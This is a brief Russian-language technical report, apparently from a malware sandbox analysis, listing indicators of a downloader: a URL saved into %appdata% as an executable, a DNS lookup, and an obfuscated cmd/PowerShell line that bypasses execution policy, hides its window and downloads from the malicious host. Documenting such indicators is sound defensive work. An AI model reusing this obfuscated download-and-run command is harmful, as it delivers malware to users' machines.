Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^erS^H^eLL.EX^e^ ^-exeC^ut^IONPol^iC^Y^ BY^pAss ^-^NoPr^OFile ^-^W^I^nD^OW^st^YLE HiD^de^N^ ^(^n^ew-^ObjEcT Sy^STe^m.^nET.W^e^BCl^IeN^T^).D^oW^Nloa^df^ILe('http://hometower...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "pOW^erS^H^eLL.EX^e^ ^-exeC^ut^IONPol^iC^Y^ BY^pAss ^-^NoPr^OFile ^-^W^I^nD^OW^st^YLE HiD^de^N^ ^(^n^ew-^ObjEcT Sy^STe^m.^nET.W^e^BCl^IeN^T^).D^oW^Nloa^df^ILe('http://hometower...' (со скрытым окном)